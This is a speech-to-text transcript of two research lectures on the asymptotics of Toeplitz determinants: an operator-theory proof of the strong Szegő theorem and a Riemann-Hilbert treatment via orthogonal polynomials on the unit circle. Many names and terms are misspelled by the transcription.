Tn of phi is just the zeroth coefficient to the nth power because it's triangular. Okay, the other, sorry, obvious but observation we want to make is that the finite matrix is just the upper left corner of the infinite array. So if you take the whole array and you just chop it off like that, you get the finite matrix. Okay. Now here's a crucial, crucial algebra step that makes this all work. If I have chalk, is there chalk? Yeah. Let me write this out because it's kind of, it's important. So if you as an operator whose matrix representation is upper triangular, so if you have something like this. So ours topolitz ones look like this, right? So if it has an upper triangular representation and this is all zero, right? And we apply a piece of n, what that's going to do, so all of this is zero, is it's going to make this all zero. So if you cut it off like that, it's the same thing as having a piece of n on both sides. Okay, so because if this all becomes zero, this is already zero and it's the same thing. Okay, so that's crucial. And if you have a lower triangular form, something over here, and you cut it off this way, it's the same as cutting it off both ways. So that fact is what allows you to have an absolutely simple proof of the Zegawitim theorem. Okay, so you can, so you only need one of the piece of n's in this case. Okay, alright, so if you had an operator and you could factor it into lower triangular times upper triangular, cut it off, you could move the piece of n inside and finding your determinant would be absolutely trivial. Okay, so that's what, that would be wonderful, but that doesn't happen. What happens for Toblitz operators is the opposite. It doesn't factor into L times U, it factors into something that's U times L. So it does just the opposite of what you want. So what are we going to do? We're more or less just going to fix that via a commutator. Okay, so now we have to talk about something called the Wiener-Hot factorization of the function. Okay, so our function lives in this bonnock algebra. It doesn't vanish, it has winding zero. It has a logarithm. If you take the logarithm of it, okay, imagine taking the logarithm, you can split it into a piece that has positive coefficients plus a piece that has negative coefficients. You can exponentiate that back and what you're going to have then is a product of something with positive coefficients and possibly zero times something with negative coefficients. It doesn't matter where you put the zero term in either factor. Okay, so we have this Wiener-Hot factorization which allows us to write our function phi as a function with negative possibly zero coefficients times a function that has positive for a coefficients plus possibly zero. Okay, so phi plus extends to be analytic inside the unit circle and phi minus, because you're just replacing z by one over z, extends to be analytic outside the unit circle. And this is true also of these inverses. As long as we're in this bonnock algebra, whatever holds for anything that is legal will hold for everything. Okay. All right, so we have that factorization and then we look at our properties again. Remember what we said, if you have a plus function, you can factor it out onto the right. So t of phi is t of phi minus times t of phi plus if you have this factorization. Okay, but what does t of phi minus look like? It has coefficients above the diagonal, t of phi plus has coefficients below the diagonal. So t of phi minus is upper triangular, t of phi plus is lower triangular. So that's the splitting we have. It's not quite the right one. It's the wrong order. So but we're still going to make use of this and this is what's really crucial. Okay, so here's how this goes. You take your topolitz operator t of phi. You truncate it to get your upper left-hand corner and then you split that function apart and now we have upper triangular times lower triangular. And what we're going to do is insert more or less the order we want on the outside. So we're going to put a t of phi plus times t of phi plus inverse, those cancel because they're plus functions. And t of phi minus times t of phi minus inverse, those cancel because you can always bring minus functions in from the left. So we haven't changed it. But now what we can do with that piece of n is bring it inside because of that property that the t of phi plus is lower triangular so the pn will come inside and on the right-hand side the pn can come inside one step. So this is just basic linear algebra. Okay, now if you take determinants, think of taking determinants of that whole thing with respect to the finite matrices. The determinant of the t of phi minus is just phi minus the zeroth coefficient to the nth power. For the t of phi plus it's just phi plus the zeroth coefficient to the nth power. That's all it is. So we've got that. Okay, what's left is the middle. So the middle has the pn and has four operators. But now we're going to use our algebra again. If you take the two on the two most left ones, t of phi plus inverse times t of phi minus, use your algebra property and collapse those. Then it'll be t of phi minus over phi plus plus two honkels. But what are those two honkels? You're in your algebra so those honkels are trace class. The same thing for the two operators on the right. That's going to be phi plus over phi minus, collapse those. We can always collapse. We have then that topolets plus honkel. But now collapse again. I mean if you multiply those four functions together what do you get? You get one. With repeated collapsing you always have something plus trace class, something plus trace class and eventually i plus trace class. Remember it's an ideal so you can always can multiply and you're still in trace class operators. So this is of the form i plus a where a is trace class. And then you just use the fact that the finite determinants converge to the infinite determinant. And that converges then to this determinant of the product. But we can take the t of phi plus inverse and move it all the way over because it's just a standard property of determinants. And so it's a little bit easier to write it the way you have it there on the right, determinant of t phi t phi inverse. Collapse them again. So that's it. You know you just set this up correctly and then there's sort of a three line proof and everything works. Okay. So the assumptions are phi has to be in the bonnack algebra, winding number zero, can't vanish winding number zero and you've got your theorem. I'm sorry. Second term. Second term. Yeah. I'm going to say something about that. Yeah. Yeah. In a second. Yeah. So where have we used that the sum of absolute value we have used that the Sobolev norm converges? Where have we used that the sum of absolute values actually? Well, we have what we're starting with, we want a continuous symbol. And we're starting, if we just have that Sobolev norm, we don't have the bonnack algebra. We're using that over and over again. Right. Yeah. Just in the bonnack algebra part. Yeah. Was there another question? Yeah. So we'll talk about, we'll actually talk about an identity instead of this in a second. But let's stop here and go on. Okay. I just want to rewrite this because this is not the original way that Zago wrote the answer. So how do you get the original answer? So again, if you take this operator and you write it as T phi minus T phi plus T inverse phi minus T inverse phi plus, you can do that because for the plus and minus functions, inverse and commute with the topolitz part, then this is a, you can rewrite this as e to the a, e to the b, e to the minus a, e to the minus b, where a is T of log of phi minus and b is T of log of phi plus. Okay. So that's again, just simple algebra. But there's a formula for such a determinant. Comes from the Baker-Kamble-Hausdorff formula. So the determinant of such a product is the exponential of the trace of a, b minus b, a. I gave a similar talk once and then someone told me at the end it was trivial because the trace of a, b minus the trace of b, a must be zero. So there, so I was being really, you know, silly. But a, b minus b, a in this case is trace class. It isn't the fact that a, b is trace class. You have to take the difference. So there really isn't, this is really right. There really is an answer. And if you take, simply take that trace, you get this sum here. You get the exponential of k, from, of the sum from k equals one to infinity of k, of log, log of phi sub k, log of phi sub minus k. So this is, this is Zago's original answer. And just notice that this is never zero. And he was actually, the first case he did was for a real valued function. And in that case this is actually, the, the phi sub, the log phi minus k, that, that product is actually the absolute value of log sub phi of k. That sum is actually positive. Okay, so that's the answer. Okay, so we've got an answer. We've got our proof. And so what I want to do is talk about now adapting this proof. Or I just want to tell you how you can adapt this proof. So this, you know, if you, if you have a proof that is nice for one thing, but never works for anything else, maybe it's not so great. But this proof actually works in a whole bunch of settings. And the, the real essence is you just multiply on the right and left by something that makes the middle thing trace, i plus trace class. That's really, that's really the, the moral here, the lesson. And so it extends to lots of other things. And so let me kind of go through that list. So the, the same proof works almost word for word for matrix valued symbols. I haven't talked about matrix valued symbols at all here. But instead of constants running down diagonals, you can, you can, you can have a matrix valued symbol so that the things on the diagonals are actually matrices themselves. So you're actually getting periodic diagonals then. So the same, the same proof works except that you have to have a two sided factorization. I mean, you have to be careful about order. So it's a little bit different. And the other thing about the matrix case is that, that last computation I did where I wrote it in Zago's original form does not work because things don't commute the right way. This, I mean, the actual scalar functions don't commute. So it's, in the matrix case, it's hard to figure out the answer, the actual answer. I mean, if it determines an answer, but it's maybe not an answer that you know a lot about. And in the matrix case, the answer can actually be zero. And you don't even, can't even tell ahead of time sometimes. So the matrix case, there's a ton of work in some sense still to do. There is some stuff known, and we could talk another whole hour about the answer, just the answer itself in the matrix case. Now, this same proof also works to give you an identity for topolitz operators. You have to use one more sort of little fact, and it's something that's called a Jacobi identity for projections. It's an old, old thing about determinants that everybody's mostly forgotten. But if you use it for this, it works. And it says the following, and this helps answer the other question about other terms. This is not asymptotic, this is equals. So given the conditions of our theorem, the topolitz determinant is equal to the geometric mean to the nth power times our constant E of phi, which is a determinant of T phi, T phi inverse, times another infinite determinant. But this infinite determinant is I minus a product of Honkels. And z here is e to the i theta. And what each of these Honkels do is 10 to zero in the Hilbert-Schmidt norm. And what happens, well, it's not quite right. Those are Hilbert-Schmidt matrices, actually, times projections that are tending to zero. And so that term tends to zero in the trace norm. So if you like, you can try to expand this and get other terms. That's one way to try to do it. And sometimes we've done that. So this is another way to prove Zegos theorem. You just say that the Hilbert-Schmidt norm, or rather the trace norm of the product of Honkels tends to zero, so that determinant tends to one. So this is an identity. This identity was done independently by two different groups of people. Case Geronimo did one, did it a long time ago in sort of an appendix of a paper, and no one knew about it. And then Borodin and O'Koon cough did it in risk because of some random matrix theory problems. It was sort of rediscovered and now been redone in all kinds of settings. OK. You have one minute. I have one minute. I thought I had to. No. OK. All right. So yeah, that's fine. So it can also be adapted to this case. And this is actually sort of new. So if you take your topless matrix, and if you have an analytic function, say defined on a disk that's as large as the norm of the function, the infinity norm, then you can take f of t of phi. And you can ask, you can truncate that operator, have no idea what the matrix representation looks like, but you can ask about the asymptotics of its determinant. And you can do the same proof. And here's the answer. It's the geometric mean applied to f of phi times the determinant of f of t of phi times t of f of phi inverse. So the very same proof works. And it works in the matrix case. And sometimes you get sort of interesting answers out of this. It can be adapted to perturbations of a topless matrix. You can take topless plus honkel and chop it off, and take the upper left-hand corner, and ask about those asymptotics. Or you know, t of phi plus h of psi even, you can change h. So it's very, very adaptable. OK, so I think maybe next time I'll start, if I have just about out of time with the integral operator case. So the next thing I'll start with is adapting, or just showing you why. I'm not going to redo the proof of why this works also for integral operators. In some sense, they have exactly the same structure. It's just different projections, different setting. But it's completely, the proof is completely analogous in the Wiener-Hoff setting. So we'll start with that next time. Just a little word about history. So Zegel did what's called just the Zegel theorem, which didn't have the constant term in 1915, long time ago. And then in an answer to a question about an Ising model given by Anzager, extended it to the constant, and I think it was around 1952. And he did it for positive functions that were smooth. And then this became more important in that setting, and then it was extended by lots of people. Widem extended it to the matrix valued case much later, in about 76, I think. So it's now for the, this, with the matrix addition, is generally referred to as the Zegel-Widem theorem. OK, I'll stop here and then start up again with the other. OK. OK, so we have, yes, so questions? Yes, all right. Hi. Sorry, may I ask you about this Bredin-Konkov case, Cironima? So does this identity mean that E of phi, so this constant, is equal to 0, only if the determinant of Tn of phi is equal to 0 for any n? No. No, not at all. You mean, OK, E of phi, right, is never 0 in the scalar case, first of all. It can only vanish in the matrix valued case. Yeah, yeah. Formula B. Yeah, yeah. But it does mean something that you might be asking me, this formula here. Yeah? Yeah. OK, so if, yeah, so in the scalar case, E of phi is never, never 0. In the matrix case, it can be 0 and the determinant of T of n of phi still not be 0. What that really means, yeah, you're not going to have such a nice factorization in that case. The way to interpret it is the determinant of T sub n divided by G of phi to the nth goes to 0, just goes to 0. In that case, it doesn't give you any good information. You have to do something more to, yeah. It's like the scalar case with a lot of winding or something, yeah, right. Is that what you're asking? Yes, exactly. Yeah, right. But you can see something out of here. So if it's actually a case where you can figure out E of phi in the matrix case, if those honkles, if those things, see that phi sub, the Z to the minus n will kill your coefficients if they, if they're, if you only have a finite number of them, right? So if your coefficients only go out to, say, index 5 or something, and you multiply it by Z to the minus n, those honkles disappear. And then you can compute E of phi from a finite determinant. And that's a case where you can actually do it in the matrix case. But in general, you, in general, that's really, no general results exist except for that, yeah. So any further questions? So I just have a quick question. So this theorem still at the end, sorry, I asked the same question again. At the end, the theorem only requires the finitude of the Sobolyph norm. This Banach algebra structure is the artifact of the proof, and then by density arguments and stuff like this, it can be, is it? Yeah, that's right. But it's not if and only if. So, yeah. So for example, if you have a real valued function, let's go back to the, oops. Okay, so if you have a function in L1 that has a logarithm that exists in L1, and you write down the Fourier coefficients, and if that sum is finite, then Zegos theorem works. Right. Yeah. That's all you need. Just for, all you need it is for the log of that sum, that you take the coefficients of the log. So it's for real valued functions with the logarithm in L1, it's sort of if and only if. And that's an if and only if. Yeah. And in matrix case also there is a if and only if. No, there's no, in matrix cases, no, there's no, there's no, there's no, matrix case is just much, much, you know, in some ways it's the same proof. So you think, okay, it's kind of the same, but the matrix case is, is difficult. And you've got these cases where the if, if is zero and you don't, then you just getting nothing out of it. For very simple functions that if can be zero. Yeah. Is that 10? Yeah. Could you tell us a good reference for some of the properties at the beginning of your lecture? Reference for the, yeah. I actually have these at the end of my slides. I mean, the historical properties are just the properties of the trace class things or the whole, all of it. Yeah. Is that, yeah. Figure, I figure people. Yeah. So I can, I'm going to go to the very end of the slides because I have some references done, but, but then I ran out of time. Okay. So this is all coming tomorrow. Okay. So these, this is the original paper of Zago in 1915. And then the one that, that actually produces the constant, which was the, you know, the answer to Anzager's question is in 1952. And then there was a huge amount of activity in this field. There's lots of people I haven't mentioned yet that I was going to do at the end. But Albert Bakhter and Bernard Silverman did a lot of work in this area, especially for singular symbols, which we're going to talk about later. And they, they have two books, which in some sense have everything you ever wanted to know about Toplitz operators. One of them is called Introduction to Large Truncated Toplitz Matrices. And it's, it is accessible to the non-expert. You can actually open it up and figure out what a theorem says. The other one is analysis of Toplitz operators. It's classic in the field. And it has everything about trace class operators, Hilbert-Schmidt operators, all the Bonnack algebras, all the different spaces, everything has all these proofs that I did. Wittem's proof, which was in 76, is the first proof that used sort of operator theory to do this, this problem. Before it was, it was a lot of identities, analysis. They were nice proofs, but this, that was the beginning. And that's the first place that this infinite determinant was used. And then Harold and I, the Brody and Kuhnkopf identity thing was done first with different proofs, and then we gave a proof that used the same operator theory techniques in a long time ago, 2002. So but the, the Bochter and Silverman books are great reference books, and especially that, the large truncated matrices. A lot about the spectrum. I didn't talk at all about spectrum of finite matrices, but that's another whole, you know, subject. We're, we're the eigenvalues of the finite matrices. That's a case where you often want to change the underlying space. You don't want to use H2. You want to use something else. But you know, we could talk a lot longer. Okay. Okay. So, and I just make the remark that Seger's first reference here was written when Seger was about 20 years old and was in the trenches of the First World War in the Austro-Hungarian Imperial Army. And we thank our speaker again.
These lectures will focus on understanding properties of classical operators and their connections to other important areas of mathematics. Perhaps the simplest example is the asymptotics of determinants of finite Toepltiz matrices, which have constants along the diagonals. The determinants of these n by n size matrices, have (in appropriate cases) an asymptotic expression that is of the form Gn×E where both G and E are constants. This expansion is useful in describing many statistical quantities variables for certain random matrix models. In other instances, where the above expression must be modified, the asymptotics correspond to critical temperature cases in the Ising Model, or to cases where the random variables are in some sense singular. Generalizations of the above result to other settings, for example, convolution operators on the line, are also important. For example, for Wiener-Hopf operators, the analogue of the determinants of finite matrices is a Fredholm determinant. These determinants are especially prominent in random matrix theory where they describe many quantities including the distribution of the largest eigenvalue in the classic Gaussian Unitary Ensemble, and in turn connections to Painleve equations. The lectures will use operator theory methods to first describe the simplest cases of the asymptotics of determinants for the convolution (both discrete and continuous) operators, then proceed to the more singular cases. Operator theory techniques will also be used to illustrate the links to the Painlevé equations.
10.5446/54155 (DOI)
So, it is great to be here, of course, and I am not from Purdue. I am from Indiana University, Purdue University, Indianapolis. It is different institution, although related. So, I will let me again write down it again. So, we have a symbol. This is a unit circle. I re-entered positively. So, I am going to talk just about truncated triplet matrices, G minus K. And we are interested, of course, on this. So, this is a... And I will present an alternative point of view, which is... So, Estelle giving us this operator, operator, operator, operator, techniques, operator view, the general theory of operator's approach. I will present the sort of classical analysis approach. So, it is complementary things. It appears... This approach, which I am going to present, it is more recent, although, again, it based on much more classical mathematics. So, basically, I won't leave 19th century mathematics almost. So, only in one point. One point I would use the 20th century mathematics. But mostly, it is going to be, indeed, 19th century mathematics. And it is... I would say that it is not quite complementary to operator's techniques approach. So, how it developed, it came first, it came to the... As an application to the top is determinant of the techniques developed in the modern theory of integrable systems. And what we did first, first we just, you know, followed our great people before us, who is operator approach. So, we first, we just developed the technique, proving what they already proved. And I am going to present some of the things right now. And... But then, indeed, it turns out that we can do, in some sense, kind of more efficient techniques, especially on the situation related to special functions and to Pinnivia functions. And this is what... But it is not for today. Maybe tomorrow I will come to this situation when Riemann-Hirbyt technique seems really very convenient, at least. So, but first let me just present the classical facts. Not operator analysis facts, but classical facts about top is determinant. So, there are... First of all, top is determinant can be written as a multiple integral. And this is what is... What... What now in... Especially in physics, like it very much. So, this is... This is this multiple integral. A few of zj... zj. So, by the way, those two cases, those two formulas show that the difficulty, that I want to analyze large and limit, and so either I have to work with the determinants whose size goes to infinity, or I have to work with multiple integrals, the number of integrations goes to infinity. So, this is the crux of the issue from the classical analysis point of view. And in fact, the operator technique, it is exactly one of the way to handle it. Absolutely. So, this is what... This is what it is. You actually can think it is very interesting. Once I was pointed out by Misha Semyonov-Tinshansky, that in a sense, so what is the difference between classical analysis and modern analysis? In classical analysis, you study asymptotics of integrals when the number of integration is fixed. In the modern analysis, you actually study integrals when the number of integrations goes to infinity. Because modern analysis deals with what? With classical, with quantum mechanics. What is quantum mechanics? It is this when the number of integrations goes to infinity. It is Feynman-Feynman integrals. And this is what an operator met. They came to produce the correct environment for this situation. However, there is another way to handle this. And it goes, it comes from again, from the classical analysis. This is the Riemann-Gilbert problem. I will show how it takes care of this, of this, of this large N situation. But before, and it is very important for this Riemann-Gilbert approach, the definition of topless determinant orthogonal polynomials on the circle. So this is again the main thing. So this is the, first of all, there is a following formula. Where HN, these numbers came from the theory of orthogonal polynomials on the unit circle. This is the Barrier-Simon invented, the terminology. So what it is, I have, so having, having symbol phi, I cannot only define topless determinant, I can define the collection of Manik orthogonal polynomials, which are orthogonal to equals HN, K, K from 0 to N. So this is the, so this is the linear system. This is the linear system on coefficients of these polynomials. So when, when I go to N minus 1, this is the linear system on this orthogonal, on the coefficients of these orthogonal polynomials, this matrix is exactly topless matrix, of course. And so this is the kind of the fundamental relation. HN already would be defined, new uniquely from this. So this is this HN. It is important to, so this, this relation is one fundamental relation to orthogonal polynomials. And other, there are a couple of more important formulas which I'm going to use. To, to, to produce this formula, I need to introduce something else. It is this. What is this P, P hat? This is a kind of the accompany polynomials to my original, IZ. So I again can introduce, you know, the Manik polynomials. Let's call them P hat. Why is this formula? Again, topless matrix is the matrix for these coefficients. And this is what is participating in this thing. This P hat also satisfies the following relation. So this is why we are talking about orthogonal polynomials. Moreover, afterwards it can be shown that this H is the same. And so there is this kind of the orthogonality between those two. And now there is no condition here. K is from 0 to N. K is from 0 to N. Here, of course, it is already a trigonality between all N and K. And why, why is this the terminology orthogonal polynomials? Because in the classical situation, when phi is, phi is real, when phi is real, then this P hat of z minus 1 is, in fact, this P of z. In general case, this P hat is P z phi. So if I have my orthogonal polynomials constructed by phi, then this is this relation. It is easy to see, of course. It is easy to see this relation. So I just described this object. And what is important is that logarithm of determinant of z can be written as the following integral, double integral, P n z, Q, P n z gamma, Q n minus 1 z gamma, minus P n, minus P n z gamma, Q n prime z gamma, times z minus n phi of z minus 1 over 2 pi i dz. So this is what I think is integrating with respect to d gamma. P n z gamma means that I construct it with respect to gamma. Phi gamma is gamma phi plus 1 minus gamma. So if I can introduce this parameter gamma in weight, then I can reconstruct the logarithm of determinant according to this formula. So I am not going to prove it. It is a very classical thing. So it can be found in any kind of text book in Meta book for this. I am talking about bigger. Right. What? Bigger. Bigger? No. Oh, okay. Bigger, even bigger. I don't know what to do. Maybe. So probably I would, at least I would rewrite, let me rewrite this formula. Let me rewrite this formula. Bigger. Phi gamma, multiplied by z minus n phi of z minus 1 over 2 pi i dz, d gamma. So again, phi gamma, it is gamma phi plus 1 minus gamma. So I join, I just consider the straight line in the space of the symbols from one to two, my symbol phi. So qn of z is minus 1 over hn, zn, pn, z minus 1. So again, the meaning. So is it, is it visible? Okay. So again, the meaning of this formula is that I have two collection of polynomials, orthogonal polynomial pn and this pn hat. And I consider them, I introduce dependence on gamma on some parameter in inside, which is just n i, and this is a formula for the determinant. Of course, I have to say that it is not necessary again that a condition on there should be, I assume that automatically all the conditions are satisfied so that the orthogonal polynomial exists. So it means that the determinant is not zero. So when phi is positive, is when phi is positive, then it is, it is automatically, automatically okay. But if phi is not, it is of course, might be, might be issues. But again, in each concrete case, you have to, you have to take care of it. You have to look if it is indeed possible to, to arrange. But I would assume that, that, that everything is, is, is, is okay. Very well. So that is the classical stuff. So this is a classical theory. So which means that, that according to this classical theory, I could, I, in principle, I could calculate the symptoms of the, of the topless determinant. And if I can handle the symptoms of the orthogonal polynomials. But it is again the problem because that orthogonal polynomials, you would have similar, there is no, it is, it's kind of topology because for orthogonal polynomials, you can, you can, you, you, you, in principle, you, you have to know a symmetric of topless matrices. And here it is. So let us introduce, so this is a representation of orthogonal polynomials on the unit. So it was introduced by Beck, David, Johannes. So let's define y of z in the following way. So I put this pn of z here I put qn minus one of z and here I take kashi transform with this weight of the first column. So this is 2 pi i c qn minus one s s minus n p of s. Okay, so let's define such a matrix function. Then this matrix function is going to satisfy, is going to satisfy the following properties. So it is first of all an elitist everywhere outside of the unit circle, which is of course trivial. It is, it is a trivial fact, which has, which has under, again under good condition on, on phi, which has a plus minus values when z goes to unit circle. So this is plus, this is minus. So what's the sum matrix is this, z minus n, phi of z. So this is again trivial, you don't need anything about p and q. It is just the Plymej-Sachotsky formulas for the second, for the second column. And finally, this is where the tagonality is essential. It has the following asymptotic success goes to infinity. And this is where indeed, so so far, I could have used any two polynomials. And that would be satisfied. But this one, we need a tagonality. So let me just check it. Let me just check it. So this is, this is again easy, simple, but later, but is important. So what does it, so in other words, what does this mean? It means that my y of z actually behaves as z to the n, a sum such like minus n minus 1, and z to the minus n plus or z to the minus n minus 1. This is how I can rewrite this condition. So it means that on the second column, I have, I have a very deep, deep zero. Is this in this? And of course, this deep zero is possible only if my p is orthogonal to the proper sequence of, the proper sequence of moments at zero. So let's just, let's just check this. Let's just look at this. So my integral is, of course, I can rewrite it, 2 pi i. I can rewrite it as, I can expand. If z is far from unit circle, I can just expand this, this denominator in the geometric progression. And what I would get, I would get this. And of minus c k plus 1 k from zero to infinity, and here I would have c p l s s to the power k minus n phi of s ds 2 pi i. And it is easy to see that you remember the condition of orthogonality was p and z, z minus k phi of z d z 2 pi i z equals zero. So that was the condition of orthogonality. So k zero, it is zero. And so up to the k equals, what? I can, I have to, plus one z. Up to the k equals n. It's always going to be, to be zero. So indeed I would have this. I would have this. And similar, similar analysis can be done with this integral. And this normalization is correct because you remember q n minus one, it is one over h n exactly. And so this was, this was this. So this is three, three, three properties of this, of this matrix function. And the crucial observation is, the crucial observation is that these three properties determine this y uniquely. These three properties determine this y uniquely. Let's just prove it. First I notice that automatically determinant of y is one. So if I take determinant, then determinant would of course, a priori satisfy this condition, but it would have no jump because the determinant of this matrix is one. And also at infinity it would go to one because this determinant is also one. So we would have that, we have a function which is analytic everywhere on complex plane and goes to, to, to unit at infinity. So it is identically one. So that is this. And second, if I have another function, if I assume that there is another function not necessarily constructed by this formula, but which satisfies this condition, which satisfies this conditions. And if I consider the ratio, I can, I can, it is because of that it is an innocent operation to take y minus one. I will get a function. This is already matrix function, which is what, which is again a priori analytic outside of C. But when it goes to C, they would gain exactly the same jump, and it is the right, right order of matrix multiplication jumps is cancelled. So again, it is has no jump. And then at infinity, what is going on at infinity again, this is the right order, because those two factors, they would meet, they would meet each other here and cancel. And so again, it in things, it was also identity matrix. So then it is identically one. So it means that we can. So the whole idea now to, to think, think it is kind of forget about this formula. Forget about this formula. So now, if I want to talk about, about Togon of polynomials, I can just go straight to this Riemann-Hirbert problem. And if I solve it, if I can analyze this asymptotic, so solve it is a bad word in the, because I can solve it. This is the explicit formula for this solution. But the point is forget about it. Again, for large an asymptotic, this formula is useless. Again, it is tautology. Again, I have to know PN. But for this, because it is now can be taken as a definition of why it is okay because now as n goes to infinity, there is no changing called the structure. It is just, it is only here. So we have to handle it is in a sense as, as I say, if you have contour integral and large parameter is involved in some exponential, in some exponential kernel, then you just do asymptotic analysis. But of course it is, it is, it is much more complicated than, than, so, but if you, if you, if you did it, then you are talking of polynomials. Can be just reconstructed through this formula. Also Hn, it is yy2 of zero. If I put z equals zero, I get exactly Hn. So this is a, this is a kind of the, so if I have this, I can reconstruct that. And now let us see. So how many time I have? Okay. So now let me just reproduce using this technique. Let me reproduce this, this through strong cigotherium. So how we can, for instance, using this reformulation of, of, of, of, to, to, to get the strong cigotherium. First of all, I want to rewrite this formula because now we can rewrite this formula in terms of the solution of my Riemann-Hillberg problem. So it is y. So it is y, y, y, z prime, y to 1 z and minus y11 z, y21 prime z. So now it is direct. I also don't look at this. So now I have this expression for my determinant. And so let us, let us try to find a synthetic solution for this problem. And I assume, I assume a lot. And this is the, this is the kind of the, the real advantage of Riemann-Hillberg analysis. And it is an, it is an application to concrete problems when you have concrete phi. Then you can say, then you can do things very quickly. But for instance, it would be more difficult to me to reproduce the results which, which, which Estelle told us kind of this maximum, the best, the best result from the point of view of functional classes on phi. So what I, but what I can, but how can I get the strong theory quickly enough? I would just assume that my phi of s phi of z is in fact analytic in some. So what I assume, I assume that phi of z is analytic in some analysts. So phi of z, this is a unit circle, phi of z analytical in some analysts in this unit circle. Also, it does not have, it does not have, it does not have, it does not have index. So it can be kind of written like that way. V of z is analytic in this circle. So V of z is a convergence series, convergence-Larance series. So V of z is a convergence-Larance series. Okay. So now let us press it. So now I assume that my phi, it is my phi. And phi gamma is also would be all this, all this class. So now let us press it. The first thing, so now I am going to do several, several exact transformation of my original problem. And I am going to get eventually the Riemann-Gilbert problem with a small jump. So here it is, everything oscillates. And of course this is not, this is the thing which if there is no this thing, then I would just solve my problem by the contour integral of this, of this phi. And the whole my non-linear steepest descent would be just the usual steepest descent. The problem is how to get rid of this factor, how to get rid of this factor. In fact, there is a similar problem and it was actually before, like in the day of the New York Council come up with this, so they used this idea. It was for Harnke determinants. And for Harnke determinants it is a kind of the real problem to get. But for Tioplis it is easy. For Tioplis I can really, so my first transformation is for T as z and it is just z, just very naive. And which works? I just multiply it by minus n sigma 3. Sigma 3 it is always 1, negative 1. So this is z, zn sigma 3. So I just kill it, I just kill this thing by hand. And it is 1, as z is less than 1, as z is less than 1. So what would we have for T then? For T we would have the problem T plus, so the jump for T would be z to the n phi of z, z to the minus n. So of course I just move, in other words I just move this thing to the matrix. And, but infinity I have already the good normalization as we always in the standard setting of the Riemann-Hilbert problem you have. So this is oscillatory matrix. So we have to now to handle this. We want to transform this oscillatory matrix. So the matrix which is close to identity as n goes to infinity. And then, and this is the only reference to the 20th century mathematics. So if I have Riemann-Hilbert problem whose matrix is close to identity, then the solution is close to identity. Yes, and to close to identity I need to use two norms. I need to use the important fact that the cache operator is bounded to the operator in L2 for other arbitrary contours. So this is a basically this is the only moment when we in practice in practical in applications to many practical problems. And to applications mostly to applications for all of these applications for random matrices, Pindley-Weigh equations, statistical mechanics. You would need more if you apply in this is the way it come from if you apply Riemann-Hilbert technique to PDE. So this is where you really have to again to use more than just this. If you want to go to the good set cache problems. Okay, so we have this. So now what is next? And this is again, oh yeah, this is the only chalk which was long. So you know what what is a crucial observation simple, but no, no, there is no. Ah, okay, there is one. Thank you. We have chop in France. So there is this formula. You just can. So this matrix can be factorized like that. So this is our eyes are is a name for this factorization always forget count this. This L you factorization. Because you can of course make it up Apollo triangular. And now look it is now quite quite quite. Now what we can do in this is where I'm going to use this my condition of five. So it means that for instance this this matrix can be extended a little bit and a little bit bigger, bigger contour and becomes very close to identity. This matrix can be extended to the to the little bit smaller contour circle and it also becomes close to identity. Close to identity. This would mean that. So more exactly. I should not. So more. So more exactly. So more exactly. What I would do. So this is this is my this is my original unit circle. Then I can see the. So this is original see that I can see the this gamma one. And this gamma two. I see the gamma one and gamma two. They are assumed to be so this is the same domain one. This is this is the main one. This is the main two. This is the main three. This is the main four. The main four so those circles are supposed to be in the analyst where file is analytic. And so I go from T to S, which I defined as T of S multiplied by what by one Z minus and five one for Z in two. So this is so here you can just move into this is a multiply one minus Z and five minus one five minus one. For Z one three unit is nothing changing for Z from four four. No, no, no, I am just I'm just introducing it. I'm just saying so let's do the following so looking in this in this factorization let's. Ah, so it is it is right now it is it is it is it is in five. Yes, yes, it is gamma in five. Yeah, I just just I just write it like that. Yeah, yeah, yeah, so so this is this is so I saw that fall gamma from zero to one my five five gamma is analytic in the analyst so if it was gamma little gamma yes so I'm just I'm just I'm sorry I skip writing this guy because it is so far at the moment it is the same for it is the same for any gamma. So this would mean that my. Riemann Hilbert problem for it for S now would become. Riemann Hilbert problem for S. Now would be set on three contours on C. Gamma one and gamma two so I have three contours here the jump matrix would be just what is left. See the jump the jump matrix is this here. Now it is the jump matrix becomes the minus and fee minus one zero one. On the internal counter, it is z to the n fee minus one one one so this is a jump matrices for S. And it infinity S is one. And it it is common sense first common sense tells us that we that's a symptomically it looks like completely reasonable to forget about those two guys there are the jump matrices exponentially close to identity. One can expect one can expect. One can expect that S. And it it is a function which has which which which satisfy the problem just on the circle with this jump matrix with this jump matrix. And that's it. So this is on the unit circle. This is on the unit circle. And at infinity one. And this problem can be solved explicitly in scalar case so that is actually everything what was done could be done for the matrix symbol as well. And this is the moment when there's going to be a much more complicated in the matrix case. But in the in the in the in the scalar case we can solve it at once so first we introduce so called the function. So we should of course solves. And then the solution for S infinity would be given as times just identity with the rate is at one. This is an explicit solution for this function. And if we trace back if we trace back all our transformations, it would mean it would mean that my first column which participates which participates in this thing is given by the asymptotic formula. For instance, it can be written as S plus. And it can be written as D plus Sigma three. So that is an explicit kind of asymptotic leading term for the asymptotics of my wife of the first of first column which I need for my token of polynomials. Okay. I will just wrap it up afternoon. And any questions. Do the same for anchor determinant. So you have a total and polynomial on the real line. Where does it get more complicated than. No, but but but much it is also very first step. It is it is it is it is half of the audience knows all this maybe better than I am. Yeah, yeah, so this is the but this is a good once again, let me kind of a little bit elaborate on this might as question. It is exactly this first step is ruined in the if I consider if I can see the even set of room and give a problem which set exactly similar like I can see the problem not on the circle but on the real line on the interval on the real line. And of course, this transformation would be too naive, because this is this is the singularity infinity I would just bring to the singularity zero. Yeah, I just make my job matrix is solitary. The issues good. And of course, you know, again, everybody will not every what kind of the senior members of the audience knows very well what to do in the in the hunker case so you have to, instead of this information you have introduced the very important ingredient. It is the equilibrium measure. So this is how you handle this this this transformation. So, maybe I got confused. Did you introduce the notation D to the power sigma three D and D to the power. I introduce Sigma three. Sasha, D to the Sigma three it is. It is. Sigma three is up there. But D to the signal three is not. Any further questions. Yeah, yeah. Well, if not, I think we thank you.
